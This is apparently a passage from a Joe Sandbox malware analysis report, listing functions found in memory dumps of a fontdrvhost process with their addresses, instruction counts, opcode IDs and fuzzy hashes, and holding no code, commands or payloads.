                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dfd52b2613f2399e5019e9eddcc2e6e666ab59bca307af50e12e5fbd8a6c72f3
                                                                                            • Instruction ID: bc572992d21227c140b50e985dc3895cd126b4c85b79822b1cbfd9e9fd6f8344
                                                                                            • Opcode Fuzzy Hash: dfd52b2613f2399e5019e9eddcc2e6e666ab59bca307af50e12e5fbd8a6c72f3
                                                                                            • Instruction Fuzzy Hash: 7E41D970A1891D8FDF98EF68C895BECB7B1FB58305F5481A9914EE3261CE34A891CB40
                                                                                            Function 00007FFB4B2C0AD0 Relevance: .1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba20deefa845c4ccbefc33e896bbf58c8423cd49ac101b9726077cc696072da5
                                                                                            • Instruction ID: c49136257de3c9c2372acd7d6d9984547799bcc33c7c6ae2450aa43b40624794
                                                                                            • Opcode Fuzzy Hash: ba20deefa845c4ccbefc33e896bbf58c8423cd49ac101b9726077cc696072da5
                                                                                            • Instruction Fuzzy Hash: 1B31CBB091891D8FDF94EF68C855BEEBBB2FF98305F10452AD509E3295CB349845CB80
                                                                                            Function 00007FFB4B2C4BE9 Relevance: .1, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0912c7732450a79070e340d4d88d8d33cb9e1dab90067350cf65836bf82e927b
                                                                                            • Instruction ID: b3793ad0ccec53d97d64300bf602107313897922acba9df8018d2bc0cc699983
                                                                                            • Opcode Fuzzy Hash: 0912c7732450a79070e340d4d88d8d33cb9e1dab90067350cf65836bf82e927b
                                                                                            • Instruction Fuzzy Hash: 54417EB0D096598FE746EFB4C8596EEBBB2FF55301F4041BAD049D72A2CB399981CB40
                                                                                            Function 00007FFB4B2C4535 Relevance: .1, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 05f72a15ad1e19ee8a50cef496cbb31e4d1dd93e9bc8242fcbfd6a41db6d9233
                                                                                            • Instruction ID: 4bccecc0754055097e93c83e2ff8b46b3f9bf00fc1339e88ca8631fb8e0a3c94
                                                                                            • Opcode Fuzzy Hash: 05f72a15ad1e19ee8a50cef496cbb31e4d1dd93e9bc8242fcbfd6a41db6d9233
                                                                                            • Instruction Fuzzy Hash: 4E312BA181DACA4FE751EF3CC8242EA7FB1FF66354F4541BAE988C61A7CA245C45C380
                                                                                            Function 00007FFB4B2C1129 Relevance: .1, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 96f5fef14bdee301053086230c78b2cacf56d8cd59ae3860c55fdc496c65ac1e
                                                                                            • Instruction ID: 28ad955e65cdefcd7aa361d12f9f3842c1461e5f90d0556ea95c5ae2467dfed3
                                                                                            • Opcode Fuzzy Hash: 96f5fef14bdee301053086230c78b2cacf56d8cd59ae3860c55fdc496c65ac1e
                                                                                            • Instruction Fuzzy Hash: 42218D71908A5D8FDF81EF68D846AEDBBF1FF58311F00017AE508E32A1CA389851C790
                                                                                            Function 00007FFB4B2C3F00 Relevance: .1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e7239251b49b2405bbd9fdc7b80ec5cec90835cabf18e1150401264915e9dd5d
                                                                                            • Instruction ID: dcaf4aa9ea26206ee556618c68ca01e08b05a4a6b892cf9d49fbf0db4110b7f9
                                                                                            • Opcode Fuzzy Hash: e7239251b49b2405bbd9fdc7b80ec5cec90835cabf18e1150401264915e9dd5d
                                                                                            • Instruction Fuzzy Hash: F4313C70D0961A8BE7A9EF34C5593BAB7B1EF54300F1049B9D95DD32E2CE38A981CB40
                                                                                            Function 00007FFB4B2C6895 Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7db6a8f8a196b6af23305800c3866cdc3a1c6c94c017d21c931c684ff88cdd5a
                                                                                            • Instruction ID: a18a500ea98fed8b2b76252400aeb01a2a318419890ce4852eb6a1f59a3a9bf7
                                                                                            • Opcode Fuzzy Hash: 7db6a8f8a196b6af23305800c3866cdc3a1c6c94c017d21c931c684ff88cdd5a
                                                                                            • Instruction Fuzzy Hash: 3521A9B1C0921A8FDB19EEA4D5542FEBBF0EF19301F00057AD10AB32D1DA385A44CB91
                                                                                            Function 00007FFB4B2C3F0B Relevance: .1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f3fbb26503bf4300448cb79a5df81f0ba3b5e36a1e905fb2d71d1366e85d7f97
                                                                                            • Instruction ID: 8d7dfbb5167ae9c2ae8b9a1f43fe17537cd81fe6510183a7d5b81cccf52d2d95
                                                                                            • Opcode Fuzzy Hash: f3fbb26503bf4300448cb79a5df81f0ba3b5e36a1e905fb2d71d1366e85d7f97
                                                                                            • Instruction Fuzzy Hash: EA21A1B1D0D60A8AE7A8BF74C5456FA7BB1EF84300F104879D61E932E2CE38A941CB40
                                                                                            Function 00007FFB4B2C1048 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf364db96a206f13191a8af20435ab3fca60311eb0ed34793f1376850bf52d05
                                                                                            • Instruction ID: b4993dee05a6333bff08e0cd007401932c423cc774411cf11a0e113b01b91d87
                                                                                            • Opcode Fuzzy Hash: bf364db96a206f13191a8af20435ab3fca60311eb0ed34793f1376850bf52d05
                                                                                            • Instruction Fuzzy Hash: FD219F74A1891D8FDF84EF98D495EEEBBB1FF68301F10416AE50AE3255CA34E8418B90
                                                                                            Function 00007FFB4B2C3F43 Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8bed53153c1d7a05c6034589d64606c54c673fed54b8d38e6fcfc91ddd6bec5f
                                                                                            • Instruction ID: 8ff52860af32416769203ae565d94d5a68a303912f89cb31db67577c0a633317
                                                                                            • Opcode Fuzzy Hash: 8bed53153c1d7a05c6034589d64606c54c673fed54b8d38e6fcfc91ddd6bec5f
                                                                                            • Instruction Fuzzy Hash: B8215B7094EA498EE7A9AE74C8147B97BB1EF45310F0405BAD509D32A2CE3898458B51
                                                                                            Function 00007FFB4B2C3FC1 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 81964fee5dbd57871a2f622ed70d4e25adbb10b72dbd2fa27ebf6cc8e0a0dbd6
                                                                                            • Instruction ID: 278b3033fd327e44c12ba68572d89de3fdc187535f127f361b4325c55caf6818
                                                                                            • Opcode Fuzzy Hash: 81964fee5dbd57871a2f622ed70d4e25adbb10b72dbd2fa27ebf6cc8e0a0dbd6
                                                                                            • Instruction Fuzzy Hash: 4B118BB084E78A4EE7AAAF74C8247F97FB1AF86300F0844BAD449D32D7CD289845C751
                                                                                            Function 00007FFB4B2C3F62 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9754b772f70c6b6e3cbb335e21070d532462af179fb09f9dcbcbac6915ca3333
                                                                                            • Instruction ID: 579b7fce2f5852f9a18e5a8d671d2ada55a083f1703f67e974017d9349013479
                                                                                            • Opcode Fuzzy Hash: 9754b772f70c6b6e3cbb335e21070d532462af179fb09f9dcbcbac6915ca3333
                                                                                            • Instruction Fuzzy Hash: D4118270D4DA4A8BE7B8BE38C5057BA7AB1EF95310F004979D51ED32E1CE3868058641
                                                                                            Function 00007FFB4B2C3F86 Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 10e4436094c945c525270252d138163737441468c574a9549260d472226aadb1
                                                                                            • Instruction ID: 1cffd629de0383113232cd2bb387fe8a70f126141173fc96cca19b3f70d0d010
                                                                                            • Opcode Fuzzy Hash: 10e4436094c945c525270252d138163737441468c574a9549260d472226aadb1
                                                                                            • Instruction Fuzzy Hash: 031160B0D0D64A8AE7B9BE38C5153BA7AB1EF84300F144879D51D936E2CE39A841C744
                                                                                            Function 00007FFB4B2C3EEC Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d514de9fb4c57b957609c9b61cdb04d127c7f2cea40337bc16baee2c020c0b6e
                                                                                            • Instruction ID: a4393723d207f58ecf11bffe511ae1b9e0ed6a1aa6fd6588c2954f96a492223f
                                                                                            • Opcode Fuzzy Hash: d514de9fb4c57b957609c9b61cdb04d127c7f2cea40337bc16baee2c020c0b6e
                                                                                            • Instruction Fuzzy Hash: 451191B0D0DB4A8FE769AF38C5193B97BB1AF46310F0454B9D919D32E2CE3958418705
                                                                                            Function 00007FFB4B2C3F74 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4214bb6ce01d3c68cb16f9c3d3168b439cb68619c8bde80e0df2b3411f8dc38b
                                                                                            • Instruction ID: fea6e2160af8f069f1cd749cf54699387fa065290d086ad02136558a55d356cc
                                                                                            • Opcode Fuzzy Hash: 4214bb6ce01d3c68cb16f9c3d3168b439cb68619c8bde80e0df2b3411f8dc38b
                                                                                            • Instruction Fuzzy Hash: FD1182B0D0DA4A8AE7B9BE38C5153BA7BB1EF48310F144839D90ED32D5CE38A8418645
                                                                                            Function 00007FFB4B2C3F6B Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a0fe9ace5652963a4f5aa3b2540a3e8bb87f5245b3ed300bd552ec9f6063f25
                                                                                            • Instruction ID: f62c1316d521a95636737209eac980d2abff9dfb8a6ede0e5f06051f39c65f96
                                                                                            • Opcode Fuzzy Hash: 7a0fe9ace5652963a4f5aa3b2540a3e8bb87f5245b3ed300bd552ec9f6063f25
                                                                                            • Instruction Fuzzy Hash: E801A1B090E64A8FE769EF34C5153B97BB1EF45300F044479D40AD32D2DE38A841DB05
                                                                                            Function 00007FFB4B2C6839 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 03a24fff6af68fea6daf921549bda34836c14fb68b66805d906fee6297df555c
                                                                                            • Instruction ID: 650aee9b8faf55d8726e83c7b093326835066450e92d91ec7b7562eeaba2b267
                                                                                            • Opcode Fuzzy Hash: 03a24fff6af68fea6daf921549bda34836c14fb68b66805d906fee6297df555c
                                                                                            • Instruction Fuzzy Hash: EBF03CB081D68C8FDB42EF7889582ED7FB0FF1A301F0549ABD548D7162E73495448B01
                                                                                            Function 00007FFB4B2C10EA Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3e04294da906ed1182d9bb3c4cc428b1797b709dda7bef2a0e3fb2a585f2e689
                                                                                            • Instruction ID: 646328ca9b4ab1c16130d7e932a87a20535796150c5e13016ec07f493a713442
                                                                                            • Opcode Fuzzy Hash: 3e04294da906ed1182d9bb3c4cc428b1797b709dda7bef2a0e3fb2a585f2e689
                                                                                            • Instruction Fuzzy Hash: 64E0223280CA4C4BDB90BE68AC076A6BBB0EB85308F100069E64CD2091C2689565C380
                                                                                            Function 00007FFB4B2C6680 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 77fc4edf1c680cb20268e4879671615dfdd61d107a97d5b2cefe209a49ea69c7
                                                                                            • Instruction ID: 0846e12476168981ecbf66115c3c7659451c75d9311fda47f38fbbb06952abef
                                                                                            • Opcode Fuzzy Hash: 77fc4edf1c680cb20268e4879671615dfdd61d107a97d5b2cefe209a49ea69c7
                                                                                            • Instruction Fuzzy Hash: 26E0DF7194CA4D8BDB96BF699C082987AF1FB9E308F01026AE08CC7191D7695B9AC741
                                                                                            Function 00007FFB4B2C4F5C Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f7b2ba4f33ba3dd59b755952ae63c2341ca854a48f063ddad7480f58f92aea57
                                                                                            • Instruction ID: 6e97f9146dd6c5c120e281f2bc6d15deabd8c3a42fa47ff14f69d34ba426be17
                                                                                            • Opcode Fuzzy Hash: f7b2ba4f33ba3dd59b755952ae63c2341ca854a48f063ddad7480f58f92aea57
                                                                                            • Instruction Fuzzy Hash: F9E06F7284CE0C8FDB80BFACAC0028A7BB0FF8D308F00026AD40CCB194CB618690C302
                                                                                            Function 00007FFB4B2C09D3 Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cbb570fa2c2c9993704dd28a37707b0c7e1cc74f5d2e037a4dc5dac5c43e73f6
                                                                                            • Instruction ID: caf33f812aeb908ca9b4e040448c803a633907d5eb9ef7cbd2279c8dd5d49964
                                                                                            • Opcode Fuzzy Hash: cbb570fa2c2c9993704dd28a37707b0c7e1cc74f5d2e037a4dc5dac5c43e73f6
                                                                                            • Instruction Fuzzy Hash: 1FE01A71A2891E4BD744FFACDC855FDB772FB84250B004525D10DA3171CA202C14C780

                                                                                            Non-executed Functions

                                                                                            Function 00007FFB4B2C57F2 Relevance: 6.5, Strings: 5, Instructions: 243COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O6K$@O6K$PO6K$`O6K$pP6K
                                                                                            • API String ID: 0-3104620735
                                                                                            • Opcode ID: d1e9b96ab46e23de5630f38ad5a1dc2a3dd1a9b57a95f5337625fec4f3d72837
                                                                                            • Instruction ID: feeffee91369b6f9591cf7d7423ec0d2d651c497f87230a0fdb35a838d704fbd
                                                                                            • Opcode Fuzzy Hash: d1e9b96ab46e23de5630f38ad5a1dc2a3dd1a9b57a95f5337625fec4f3d72837
                                                                                            • Instruction Fuzzy Hash: 77510E97A0F6D60FF32675BDFC561D46FA0FFD22B474843F7D1888A09BA814854A42D0

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B291EC3 Relevance: 15.3, Strings: 11, Instructions: 1538COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$[$[$\$]$]$u${${$}$}
                                                                                            • API String ID: 0-3490533229
                                                                                            • Opcode ID: 07edf34e4ed6538749a25ec7b127dbc298e95b15558af34f01530bf5727f3e6a
                                                                                            • Instruction ID: 4bf04a1d66550a4f9ee2b822ccbe7366c57d3a8393d583310017070154f765cc
                                                                                            • Opcode Fuzzy Hash: 07edf34e4ed6538749a25ec7b127dbc298e95b15558af34f01530bf5727f3e6a
                                                                                            • Instruction Fuzzy Hash: 02D2B5B0D1962D8FDBA9EF28C8957E9B7B1EF58301F1041EAD40DE7291CA359A81CF44
                                                                                            Function 00007FFB4B291250 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: ad250527ec3732c13af7829083c48fefcf7a4cb0860d942c890e1337a628f247
                                                                                            • Instruction ID: 6b19b568ead69a593f0d51eb7effe00caf303bd48966eba8ba7f34ff11ba3d19
                                                                                            • Opcode Fuzzy Hash: ad250527ec3732c13af7829083c48fefcf7a4cb0860d942c890e1337a628f247
                                                                                            • Instruction Fuzzy Hash: B1A19474A18A1C8FDB98EF58C894BA8BBF1FF69301F4541A9D00DE7265CB74AC81CB41
                                                                                            Function 00007FFB4B293A8D Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H#3K
                                                                                            • API String ID: 0-1351264863
                                                                                            • Opcode ID: 8fb86a8055033c860cb37c9cc67587a8a1ae95dd01e29f56206692a728f56080
                                                                                            • Instruction ID: 0c70d1bf3f840c555e0be2b149f461145b4d373127231e538d0ecfe1f0529e3c
                                                                                            • Opcode Fuzzy Hash: 8fb86a8055033c860cb37c9cc67587a8a1ae95dd01e29f56206692a728f56080
                                                                                            • Instruction Fuzzy Hash: B0218271A0D68E8FEB99FE38C8A56E6BBB1FF55300F0540F9C14D871A6DA756841CB40
                                                                                            Function 00007FFB4B291751 Relevance: .4, Instructions: 401COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4659b406c636db17dffd0b7bcccd29f827cb66a98cbf5ecfd65b96829b970140
                                                                                            • Instruction ID: d71064c941cbfc5cd8dca38587ae7d7c7f2afeb6c7e14f10d53adda62baf6d17
                                                                                            • Opcode Fuzzy Hash: 4659b406c636db17dffd0b7bcccd29f827cb66a98cbf5ecfd65b96829b970140
                                                                                            • Instruction Fuzzy Hash: 31E16BB1D1965D9FDB99EF68C8957E8BBB1FF48301F0440BAD04DE7292CA386881CB51
                                                                                            Function 00007FFB4B294843 Relevance: .2, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 47e5e607c0baf1ae79fbc86c5927b5c15761133baa3f9cc5109575a3438e66b1
                                                                                            • Instruction ID: 190585d62149e973ef70a20893a5c39938cec3f85410710f69450010530b8df1
                                                                                            • Opcode Fuzzy Hash: 47e5e607c0baf1ae79fbc86c5927b5c15761133baa3f9cc5109575a3438e66b1
                                                                                            • Instruction Fuzzy Hash: 0A91F470D18A1D8FEB95EFA8C8957EDBBB1FF58301F1041AAD40DE3252DB34A9858B40
                                                                                            Function 00007FFB4B291831 Relevance: .2, Instructions: 246COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1a49055085be1872b38301d16b5ef830fbf15bc3d4f4e92c25f9012abe12f556
                                                                                            • Instruction ID: 09a238aa477a0f2d587bc69e190f6761714c5de1d1449cbf295c9eabb974a4cd
                                                                                            • Opcode Fuzzy Hash: 1a49055085be1872b38301d16b5ef830fbf15bc3d4f4e92c25f9012abe12f556
                                                                                            • Instruction Fuzzy Hash: BC912CB1A1865D9FEB99EF68C4A57A8BBF1FF58301F4440B9D00DE7292CE385881CB41
                                                                                            Function 00007FFB4B290DD9 Relevance: .2, Instructions: 214COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002F.00000002.1870101240.00007FFB4B290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B290000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_47_2_7ffb4b290000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
